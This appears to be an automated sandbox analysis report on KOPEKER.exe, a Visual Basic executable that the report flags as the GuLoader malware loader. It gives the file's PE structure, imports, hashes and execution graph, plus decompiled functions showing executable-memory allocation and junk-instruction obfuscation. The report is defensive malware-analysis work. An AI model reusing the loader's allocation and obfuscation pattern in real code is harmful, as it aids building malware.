        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
        IMAGE_DIRECTORY_ENTRY_IAT0x10000x1a8.text
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

        Sections

        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
        .text0x10000x16d480x17000False0.439017917799data6.15247427314IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        .data0x180000x12600x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
        .rsrc0x1a0000x38220x4000False0.4619140625data5.13551103483IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

        Resources

        NameRVASizeTypeLanguageCountry
        RT_ICON0x1cf7a0x8a8data
        RT_ICON0x1c8b20x6c8data
        RT_ICON0x1c34a0x568GLS_BINARY_LSB_FIRST
        RT_ICON0x1b2a20x10a8data
        RT_ICON0x1a91a0x988data
        RT_ICON0x1a4b20x468GLS_BINARY_LSB_FIRST
        RT_GROUP_ICON0x1a4580x5adata
        RT_VERSION0x1a1e00x278dataEnglishUnited States

        Imports

        DLLImport
        MSVBVM60.DLL_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaLenBstr, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, __vbaLenBstrB, _adj_fdiv_m32, __vbaAryDestruct, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaObjVar, DllFunctionCall, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaLateMemCall, __vbaVarAdd, __vbaStrToAnsi, __vbaVarDup, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, __vbaLateIdSt, _CItan, __vbaFPInt, _CIexp, __vbaFreeStr, __vbaFreeObj

        Version Infos

        DescriptionData
        Translation0x0409 0x04b0
        InternalNameKOPEKER
        FileVersion1.00
        CompanyNameCluster-C
        CommentsCluster-C
        ProductNameCluster-C
        ProductVersion1.00
        FileDescriptionCluster-C
        OriginalFilenameKOPEKER.exe

        Possible Origin

        Language of compilation systemCountry where language is spokenMap
        EnglishUnited States

        Network Behavior

        No network behavior found

        Code Manipulations

        Statistics

        CPU Usage

        Click to jump to process

        Memory Usage

        Click to jump to process

        High Level Behavior Distribution

        Click to dive into process behavior distribution

        System Behavior

        Analysis Process: KOPEKER.exe PID: 5760 Parent PID: 5856

        General

        Start time:08:42:44
        Start date:19/04/2021
        Path:C:\Users\user\Desktop\KOPEKER.exe
        Wow64 process (32bit):true
        Commandline:'C:\Users\user\Desktop\KOPEKER.exe'
        Imagebase:0x400000
        File size:118784 bytes
        MD5 hash:CD885321B35B73421CD63E3150D677F7
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:Visual Basic
        Yara matches:
        • Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Author: Joe Security
        Reputation:low

        Chronological Activities

        Disassembly

        Code Analysis

        Reset < >

          Analysis Process: KOPEKER.exe PID: 5760 Parent PID: 5856 KOPEKER.exeCOMMON

          Execution Graph

          Execution Coverage:1.4%
          Dynamic/Decrypted Code Coverage:1.5%
          Signature Coverage:0%
          Total number of Nodes:132
          Total number of Limit Nodes:28

          Graph

          execution_graph 18819 4129b4 __vbaChkstk 18820 412a08 6 API calls 18819->18820 18821 412b4f __vbaFreeStr __vbaFreeVarList 18820->18821 18823 412bb4 #716 __vbaChkstk __vbaLateIdSt __vbaFreeVar 18821->18823 18824 412bfe #516 18821->18824 18823->18824 18825 412c15 18824->18825 18826 412c64 #676 __vbaFpR8 18824->18826 18829 412c5d 18825->18829 18830 412c3d __vbaHresultCheckObj 18825->18830 18827 412ccb __vbaFreeVarList 18826->18827 18831 412d14 __vbaChkstk __vbaChkstk __vbaChkstk __vbaLateMemCall 18827->18831 18832 412dae 18827->18832 18829->18826 18830->18826 18831->18832 18833 412dd9 __vbaHresultCheckObj 18832->18833 18834 412df9 18832->18834 18833->18834 18835 412ebf 18834->18835 18836 412e9f __vbaHresultCheckObj 18834->18836 18837 412f45 18835->18837 18838 412f25 __vbaHresultCheckObj 18835->18838 18836->18835 18839 412fa8 18837->18839 18840 412f88 __vbaHresultCheckObj 18837->18840 18838->18837 18973 413040 18839->18973 18979 41593d __vbaChkstk 18839->18979 18840->18839 18841 413099 18843 4130f9 18841->18843 18844 4130d9 __vbaHresultCheckObj 18841->18844 18842 413079 __vbaHresultCheckObj 18842->18841 18845 413100 __vbaStrCopy 18843->18845 18844->18845 18991 415068 __vbaChkstk __vbaVarDup #663 __vbaVarTstNe __vbaFreeVarList 18845->18991 18847 4131a7 18848 41321f 18847->18848 18849 4131ff __vbaHresultCheckObj 18847->18849 18850 413226 __vbaStrCopy 18848->18850 18849->18850 18851 413263 __vbaFreeStr 18850->18851 18852 4132ba 18851->18852 18853 4132de __vbaHresultCheckObj 18852->18853 18854 4132fe 18852->18854 18853->18854 18855 4133c7 18854->18855 18856 4133a7 __vbaHresultCheckObj 18854->18856 18968 4133e3 18855->18968 18994 415268 __vbaChkstk 18855->18994 18856->18855 18857 4133f2 __vbaHresultCheckObj 18858 413412 18857->18858 18970 41593d 6 API calls 18858->18970 18859 4134d8 18860 413598 18859->18860 18861 413578 __vbaHresultCheckObj 18859->18861 18862 4135e3 18860->18862 18863 4135c3 __vbaHresultCheckObj 18860->18863 18861->18860 18972 41593d 6 API calls 18862->18972 18863->18862 18864 41362e 18865 4136a8 18864->18865 18866 413688 __vbaHresultCheckObj 18864->18866 18975 41593d 6 API calls 18865->18975 18866->18865 18867 41371b 19004 417239 7 API calls 18867->19004 18868 413776 18869 4137c1 18868->18869 18870 4137a1 __vbaHresultCheckObj 18868->18870 18871 41381a 18869->18871 18872 4137fa __vbaHresultCheckObj 18869->18872 18870->18869 18873 413821 __vbaStrCopy 18871->18873 18872->18873 18874 41385e __vbaFreeStr 18873->18874 18875 4138a7 18874->18875 18876 413956 18875->18876 18877 413936 __vbaHresultCheckObj 18875->18877 18878 4139c2 __vbaHresultCheckObj 18876->18878 18879 4139e2 18876->18879 18877->18876 18878->18879 18880 413ab9 18879->18880 18881 413a99 __vbaHresultCheckObj 18879->18881 18882 413ac0 __vbaOnError 18880->18882 18881->18882 18883 413af6 18882->18883 18884 413b27 18883->18884 18885 413b07 __vbaHresultCheckObj 18883->18885 18886 413b7a 18884->18886 18887 413b5a __vbaHresultCheckObj 18884->18887 18885->18884 18888 413b81 __vbaVarMove 18886->18888 18887->18888 18889 413bae __vbaVarAdd __vbaVarMove 18888->18889 18971 417239 23 API calls 18889->18971 18890 413c62 __vbaHresultCheckObj 18893 413c37 18890->18893 18891 413ccb __vbaHresultCheckObj 18891->18893 18892 413dbf __vbaHresultCheckObj 18892->18893 18893->18890 18893->18891 18893->18892 18894 413e1f __vbaHresultCheckObj 18893->18894 18895 413e46 __vbaStrCopy 18893->18895 18976 41593d 6 API calls 18893->18976 18894->18895 18896 413e95 __vbaFreeStr __vbaVarTstLt 18895->18896 18897 413ee0 __vbaVarMove __vbaStrToAnsi __vbaStrToAnsi __vbaStrToAnsi 18896->18897 18898 413edb 18896->18898 19025 4115f4 18897->19025 18898->18889 18968->18857 18968->18858 18970->18859 18971->18893 18972->18864 18973->18841 18973->18842 18975->18867 18976->18893 19027 411884 18979->19027 18981 41597e __vbaSetSystemError 18982 415a05 18981->18982 18983 41598f 18981->18983 18982->18973 18984 4159b0 18983->18984 18985 415998 __vbaNew2 18983->18985 18986 4159b7 __vbaObjSetAddref 18984->18986 18985->18986 18987 4159d7 18986->18987 18988 4159e2 __vbaHresultCheckObj 18987->18988 18989 4159f9 18987->18989 18990 4159fd __vbaFreeObj 18988->18990 18989->18990 18990->18982 18992 41314f __vbaFreeStr 18991->18992 18993 4150fd #532 18991->18993 18992->18847 18993->18992 18995 4152aa __vbaStrToAnsi __vbaStrToAnsi 18994->18995 19029 41169c 18995->19029 19005 4172c1 19004->19005 19006 417373 __vbaStrCmp 19004->19006 19007 4172e0 19005->19007 19008 4172e8 _adj_fdiv_m64 19005->19008 19009 417467 __vbaVarDup #645 __vbaStrMove __vbaFreeVar 19006->19009 19010 41738a 19006->19010 19011 4172f9 __vbaFpI4 19007->19011 19008->19011 19012 4174c8 __vbaFreeStr __vbaFreeObj 19009->19012 19013 417393 __vbaNew2 19010->19013 19014 4173ab 19010->19014 19015 41734a 19011->19015 19012->18868 19013->19014 19018 4173d4 __vbaHresultCheckObj 19014->19018 19019 4173eb 19014->19019 19016 417355 __vbaHresultCheckObj 19015->19016 19017 41736f 19015->19017 19016->19006 19017->19006 19020 4173ef __vbaChkstk 19018->19020 19019->19020 19021 417423 19020->19021 19022 417445 19021->19022 19023 41742e __vbaHresultCheckObj 19021->19023 19024 417449 __vbaObjSet __vbaFreeObj 19022->19024 19023->19024 19024->19009 19026 4115fd 19025->19026 19028 41188d 19027->19028 19030 4116a5 19029->19030 19031 401968 #100 19032 40197a 19031->19032 19032->19032 19033 40ad9a 19034 40adf3 VirtualAlloc 19033->19034 19035 40ae86 19034->19035

          Executed Functions

          Function 0040A335, Relevance: 26.2, APIs: 1, Strings: 16, Instructions: 672memoryCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 425 40a335-40a3c4 426 40a420-40a4b8 425->426 436 40a2fd-40a3c4 426->436 437 40a4be-40b453 VirtualAlloc 426->437 436->426 476 40b456-40b861 call 40ba16 437->476 486 40b867-40b984 476->486
          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID: ====$====$====$====$====$====$====$====$====$====$====$====$====$====$====$====
          • API String ID: 4275171209-1019510184
          • Opcode ID: 15a62f928a399705a60ab1457e5cb2be374277282beb5d814aaf66834bcdb510
          • Instruction ID: 61364b16a50175e7f8371760d617679fed52b0131cfca2c1e233bad75d050bf2
          • Opcode Fuzzy Hash: 15a62f928a399705a60ab1457e5cb2be374277282beb5d814aaf66834bcdb510
          • Instruction Fuzzy Hash: A712DD85A2A70249FFB22160C5D072D6980DF16385F718F3BD861F59E2A71FC6CE1687
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00409C39, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 873memoryCOMMONCrypto
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 526 409c39-40a2f7 544 40a2fd-40a4b8 526->544 556 40a4be-40b453 VirtualAlloc 544->556 594 40b456-40b861 call 40ba16 556->594 604 40b867-40b984 594->604
          C-Code - Quality: 19%
          			E00409C39(void* __eax, void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi) {
				void* _t21;
				signed int _t22;
				signed int _t23;
				void* _t25;
				intOrPtr* _t27;

				_t27 = __edi;
				_t25 = __ecx;
				asm("aas");
				_t21 = __eax - 0xfffffffd218f045d;
				_t22 = _t21 + 0x302ae2;
				asm("fst st4");
				asm("pslld mm5, 0x15");
				asm("fabs");
				asm("psrlw mm4, 0xa7");
				asm("fclex");
				asm("punpckhwd xmm4, xmm1");
				asm("psubusb mm5, mm1");
				_t23 = _t22 ^ 0x002fa634;
				asm("fdecstp");
				asm("pxor xmm3, xmm3");
				asm("punpcklwd mm2, mm6");
				asm("pslld mm5, 0xd7");
				asm("fchs");
				asm("wait");
				asm("punpckhdq xmm6, xmm5");
				asm("paddd xmm0, xmm5");
				asm("fdivr st6, st0");
				 *_t23 =  *_t23 + _t23;
				goto L5;
				 *_t23 = _t23;
				 *_t23 =  *_t23 + _t23;
				 *_t27 =  *_t27 + _t25;
				asm("psllw mm6, 0xca");
			}








          0x00409c39
          0x00409c39
          0x00409c39
          0x00409c8f
          0x00409c94
          0x00409cba
          0x00409cbc
          0x00409cc0
          0x00409cc2
          0x00409cc6
          0x00409cc8
          0x00409ccc
          0x00409d3e
          0x00409d52
          0x00409d54
          0x00409d58
          0x00409d5b
          0x00409d5f
          0x00409d61
          0x00409d62
          0x00409d66
          0x00409d6a
          0x00409de7
          0x00409de7
          0x00409deb
          0x00409ded
          0x00409dee
          0x00409def

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID: <`--
          • API String ID: 4275171209-3063633343
          • Opcode ID: 7bfa30859756e4d6514f91f6e8bb4dae9b5b838a603451f444bf6d48f5f9745a
          • Instruction ID: 3ac96471888af8a8ddb124f9c73aad241fcaa14d72a6d5c25eaa3a96f92f4d1d
          • Opcode Fuzzy Hash: 7bfa30859756e4d6514f91f6e8bb4dae9b5b838a603451f444bf6d48f5f9745a
          • Instruction Fuzzy Hash: 9742DE41A2A70689FFB32060C5D076D6980DF16385F718F3BDC61F59E2A72F86CA1587
          Uniqueness

          Uniqueness Score: -1.00%

          Function 004096F2, Relevance: 2.3, APIs: 1, Instructions: 1087COMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 607 4096f2-409755 609 409757-409760 607->609 610 40979c-4097a8 607->610 611 409762-40979a 609->611 612 4097b7 609->612 613 409801-409836 610->613 611->610 612->613 614 409890-409a38 613->614 618 409a3e-40a2f7 614->618 640 40a2fd-40a4b8 618->640 652 40a4be-40b453 VirtualAlloc 640->652 690 40b456-40b861 call 40ba16 652->690 700 40b867-40b984 690->700
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 4818ba7ed94ddeb400f27aa749ececd56df3dc76c3ba1d57969eadfc2f87afc2
          • Instruction ID: b2dfe81633ccef8d36f19c37e13e3b19045428f57638f13f35962e2cf9a75715
          • Opcode Fuzzy Hash: 4818ba7ed94ddeb400f27aa749ececd56df3dc76c3ba1d57969eadfc2f87afc2
          • Instruction Fuzzy Hash: 5A620C51A2A70289FFB32170C5D075D6990DF16385F318F3BD861F69E2A72F86CA1287
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00409839, Relevance: 2.3, APIs: 1, Instructions: 1056memoryCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 703 409839-40983c 704 409890-409a38 703->704 708 409a3e-40a2f7 704->708 730 40a2fd-40a4b8 708->730 742 40a4be-40b453 VirtualAlloc 730->742 780 40b456-40b861 call 40ba16 742->780 790 40b867-40b984 780->790
          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: 5c0479d164c35793aa7235be28c498c9979f3fa45a93857f3290eb14b94c9346
          • Instruction ID: fc7e048d0cddb05e869a73339eadca4f946848b6f6159ef85ae8c6a1278ea8b0
          • Opcode Fuzzy Hash: 5c0479d164c35793aa7235be28c498c9979f3fa45a93857f3290eb14b94c9346
          • Instruction Fuzzy Hash: 6652CE41A2A70689FFB32060C5D076D6980DF16386F718F3BDC61F59D2AB2F86CA1587
          Uniqueness

          Uniqueness Score: -1.00%

          Function 004099E3, Relevance: 2.3, APIs: 1, Instructions: 1055COMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 793 4099e3-4099e4 794 4099e6 793->794 795 40998a 793->795 797 409a38 794->797 796 4099aa-4099df 795->796 796->797 798 409890-40994c 797->798 799 409a3e-40a2f7 797->799 798->796 822 40a2fd-40a4b8 799->822 834 40a4be-40b453 VirtualAlloc 822->834 872 40b456-40b861 call 40ba16 834->872 882 40b867-40b984 872->882
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: bd2fb3e8fde96fee7f3627978b16af0e414aacb3aa911090de2762d1fe08c3b4
          • Instruction ID: 317dfbb73815592bbf082f3cc6b736faba496f697443b10bfc12a8fd374b4ae7
          • Opcode Fuzzy Hash: bd2fb3e8fde96fee7f3627978b16af0e414aacb3aa911090de2762d1fe08c3b4
          • Instruction Fuzzy Hash: AC52CF41A2A70689FFB32060C5D076D6980DF16385F718F3BDC61F59E2A72F86CA1587
          Uniqueness

          Uniqueness Score: -1.00%

          Function 004098C2, Relevance: 2.3, APIs: 1, Instructions: 1044COMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 885 4098c2-4098c7 887 40991d-409a38 885->887 890 409890-4098c0 887->890 891 409a3e-40a2f7 887->891 890->887 913 40a2fd-40a4b8 891->913 925 40a4be-40b453 VirtualAlloc 913->925 963 40b456-40b861 call 40ba16 925->963 973 40b867-40b984 963->973
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 8365de3a9a21a786da8acd758e2fc0dd7c603b57f5ae30297401f0bb3832be13
          • Instruction ID: e4d98999475726263c990e88f8766b7ce32bbce477638960c65b1700bab8bdf6
          • Opcode Fuzzy Hash: 8365de3a9a21a786da8acd758e2fc0dd7c603b57f5ae30297401f0bb3832be13
          • Instruction Fuzzy Hash: 5552CF41A2A70689FFB32060C5D075D6980DF16386F718F3BDC61F59E2A72F86CA1587
          Uniqueness

          Uniqueness Score: -1.00%

          Function 0040994E, Relevance: 2.3, APIs: 1, Instructions: 1027memoryCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1066 40994e-409953 1067 4099aa-409a38 1066->1067 1069 409890-40994c 1067->1069 1070 409a3e-40a2f7 1067->1070 1069->1067 1093 40a2fd-40a4b8 1070->1093 1105 40a4be-40b453 VirtualAlloc 1093->1105 1143 40b456-40b861 call 40ba16 1105->1143 1153 40b867-40b984 1143->1153
          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: a9ed749aceaa9533e2450730376c8c09acfe9d8fc0e78b0fb2736fb21d458da7
          • Instruction ID: 06167d776d8a76d4380c9659433a094f2a538bf241ec90d3ee57b3f21caaf58e
          • Opcode Fuzzy Hash: a9ed749aceaa9533e2450730376c8c09acfe9d8fc0e78b0fb2736fb21d458da7
          • Instruction Fuzzy Hash: E352CF41A2A70689FFB32060C5D076D6980DF16385F718F3BDC61F59E2AB2F86CA1587
          Uniqueness

          Uniqueness Score: -1.00%

          Function 004097AA, Relevance: 2.3, APIs: 1, Instructions: 1027memoryCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 976 4097aa-409836 977 409890-409a38 976->977 981 409a3e-40a2f7 977->981 1003 40a2fd-40a4b8 981->1003 1015 40a4be-40b453 VirtualAlloc 1003->1015 1053 40b456-40b861 call 40ba16 1015->1053 1063 40b867-40b984 1053->1063
          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: 785402c72be5d15527084795054fdbff9116c4f7882280781671060eb88e325b
          • Instruction ID: 0e5b9dd267e3d4b34a752c359b8ba59e5377bb172d0009e96618d667f1ad1e5b
          • Opcode Fuzzy Hash: 785402c72be5d15527084795054fdbff9116c4f7882280781671060eb88e325b
          • Instruction Fuzzy Hash: 7052DE41A2A70689FFB32060C5D075D6980DF16386F718F3BD861F59D2A72F86CA1687
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00409A78, Relevance: 2.2, APIs: 1, Instructions: 990memoryCOMMON
          Download Yara Rule

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 1156 409a78-40a2f7 1178 40a2fd-40a4b8 1156->1178 1190 40a4be-40b453 VirtualAlloc 1178->1190 1228 40b456-40b861 call 40ba16 1190->1228 1238 40b867-40b984 1228->1238
          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: 4e766b01f9f8237fa8018d09106ea7f30e37102a31c9bab291c5a9317b465ec3
          • Instruction ID: 4b8c3caf3c978032f5e5495958ce3026c2446fd2301887b0c5519f31e688a1c2
          • Opcode Fuzzy Hash: 4e766b01f9f8237fa8018d09106ea7f30e37102a31c9bab291c5a9317b465ec3
          • Instruction Fuzzy Hash: 6C42DF41A2A70688FFB32060C5D075D6980DF16385F718F3BDC61F59E2AB2F86CA1587
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00409B1B, Relevance: 2.2, APIs: 1, Instructions: 971memoryCOMMON
          Download Yara Rule
          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: ce1f5ec752acd3c8c6809bf1227cebe7a9db20a4f1dbd29d8cf6e358444c7d2c
          • Instruction ID: d245c96472d33d594b30ed10c78cf14fa39057c64ffc7fc0ec8dc4580a60df69
          • Opcode Fuzzy Hash: ce1f5ec752acd3c8c6809bf1227cebe7a9db20a4f1dbd29d8cf6e358444c7d2c
          • Instruction Fuzzy Hash: 3B42DE41A2A70689FFB32060C5D076D6980DF16385F718F3BDC61F59E2AB2F86CA1587
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00409BAA, Relevance: 2.2, APIs: 1, Instructions: 961memoryCOMMON
          Download Yara Rule
          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID: AllocVirtual
          • String ID:
          • API String ID: 4275171209-0
          • Opcode ID: 8ec6b45ac03d40f81627a2920cafa4c9d5ecba2d6e7deab21958c327b6202562
          • Instruction ID: 219efe499748a694dd5a310fdd4365bad9009c4a6bdc58ddbc37cab50b9fbe65
          • Opcode Fuzzy Hash: 8ec6b45ac03d40f81627a2920cafa4c9d5ecba2d6e7deab21958c327b6202562
          • Instruction Fuzzy Hash: 8342DF41A2A70688FFB32060C5D076D6980DF16385F718F3BDC61F59E2AB2F86CA1587
          Uniqueness

          Uniqueness Score: -1.00%

          Function 00409D71, Relevance: 2.2, APIs: 1, Instructions: 924COMMON
          Download Yara Rule
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 30c2bdb5863e6f1bee918cfe2aad0fd7a0d59caf23e46a3d5e1b45510e39c26a
          • Instruction ID: 3f4d2583edac220c17c515a475877b0cb29a1a2816bf2598cd68906994bf1e5e
          • Opcode Fuzzy Hash: 30c2bdb5863e6f1bee918cfe2aad0fd7a0d59caf23e46a3d5e1b45510e39c26a
          • Instruction Fuzzy Hash: A742F15192A70249FFB32160C5D072D6980EF27385F718F37D962F59D2A72F8ACA118B
          Uniqueness

          Uniqueness Score: -1.00%

